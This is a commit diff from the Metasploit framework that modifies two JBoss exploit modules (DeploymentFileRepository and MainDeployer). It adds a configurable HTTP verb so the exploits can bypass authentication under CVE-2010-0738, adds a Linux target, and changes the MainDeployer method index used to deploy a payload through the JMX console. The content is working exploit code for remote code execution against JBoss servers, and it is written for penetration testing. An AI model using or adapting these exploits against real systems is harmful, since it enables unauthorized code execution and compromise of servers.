add VERB option to enable exploiting cve-2010-0738

git-svn-id: file:///home/svn/framework3/trunk@9282 4d416f70-5f16-0410-b530-b9f4589650da

modules/exploits/multi/http/jboss_deploymentfilerepository.rb

@@ -32,6 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'References'  =>
 				[
 					[ 'CVE', '2006-5750' ],
+					[ 'CVE', '2010-0738' ], # by using VERB other than GET/POST
 					[ 'OSVDB', '30767'],
 					[ 'BID', '21219' ]
 				],
@@ -57,7 +58,8 @@ class Metasploit3 < Msf::Exploit::Remote
 				Opt::RPORT(8080),
 				OptString.new('SHELL', [ true,  "The system shell to use.",     '/bin/sh']),
 				OptString.new('URI',   [ true,  "The URI to call the payload.", '/web-console/']),
-				OptString.new('PATH',  [ true,  "The URI to deploy the payload.", 'console-mgr.sar/web-console.war/'])
+				OptString.new('PATH',  [ true,  "The URI to deploy the payload.", 'console-mgr.sar/web-console.war/']),
+				OptString.new('VERB',  [ true,  "The HTTP verb to use", "POST"]),
 			], self.class)
 	end
 
@@ -68,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		res = send_request_cgi(
 			{
 				'uri'	=>  '/jmx-console/HtmlAdaptor',
-				'method' => 'POST',
+				'method' => datastore['VERB'],
 				'data'	=>	'action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=5&arg0=' +
 					Rex::Text.uri_encode(datastore['PATH']) + '&arg1=' + fname + '&arg2=.jsp&arg3=' +
 					Rex::Text.uri_encode(payload.encoded) + '&arg4=True',

modules/exploits/multi/http/jboss_maindeployer.rb

@@ -34,11 +34,12 @@ class Metasploit3 < Msf::Exploit::Remote
 			'References'  =>
 				[
 					[ 'CVE', '2007-1036' ],
+					[ 'CVE', '2010-0738' ], # by using VERB other than GET/POST
 					[ 'OSVDB', '33744' ],
 					[ 'URL', 'http://www.redteam-pentesting.de/publications/2009-11-30-Whitepaper_Whos-the-JBoss-now_RedTeam-Pentesting_EN.pdf' ]
 				],
 			'Privileged'  => true,
-			'Platform'    => [ 'win' ], # linux untested
+			'Platform'    => [ 'win', 'linux' ], # linux untested
 			'Stance'      => Msf::Exploit::Stance::Aggressive,
 			'Targets'     =>
 				[
@@ -55,6 +56,12 @@ class Metasploit3 < Msf::Exploit::Remote
 							'Arch' => ARCH_X86,
 							'Platform' => 'win'
 						},
+					],
+					[ 'Linux Universal',
+						{
+							'Arch' => ARCH_X86,
+							'Platform' => 'linux'
+						},
 					]
 				],
 			'DefaultTarget'  => 0))
@@ -64,7 +71,8 @@ class Metasploit3 < Msf::Exploit::Remote
 				Opt::RPORT(8080),
 				OptString.new('USERNAME', [ false, 'The username to authenticate as' ]),
 				OptString.new('PASSWORD', [ false, 'The password for the specified username' ]),
-				OptString.new('PATH', [ true,  "The URI path of the console", '/jmx-console'])
+				OptString.new('PATH',     [ true,  'The URI path of the console', '/jmx-console']),
+				OptString.new('VERB',     [ true,  'The HTTP verb to use', 'POST']),
 			], self.class)
 	end
 
@@ -140,15 +148,19 @@ class Metasploit3 < Msf::Exploit::Remote
 				},
 				'Path' => resource_uri
 			}})
+
 		print_status("Making the request to the MainDeployer...")
 		res = send_request_cgi({
-			'method'    => 'POST',
+			'method'    => datastore['VERB'],
 			'uri'       => datastore['PATH'] + '/HtmlAdaptor',
 			'vars_post' =>
 				{
 					'action'      => 'invokeOp',
 					'name'        => 'jboss.system:service=MainDeployer',
-					'methodIndex' => '21',  # deploy via java.net.URL
+					# deploy via java.net.URL
+					'methodIndex' => '3', # jboss 4.0.5
+					#'methodIndex' => '21', # jboss 3.0.8
+					#'methodIndex' => '23', # jboss 3.2.7
 					'arg0'        => service_url
 				}
 		}, 20)
@@ -199,7 +211,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		#
 		print_status("Undeploying #{app_base} ...")
 		res = send_request_cgi({
-			'method'    => 'POST',
+			'method'    => datastore['VERB'],
 			'uri'       => datastore['PATH'] + '/HtmlAdaptor',
 			'vars_post' =>
 				{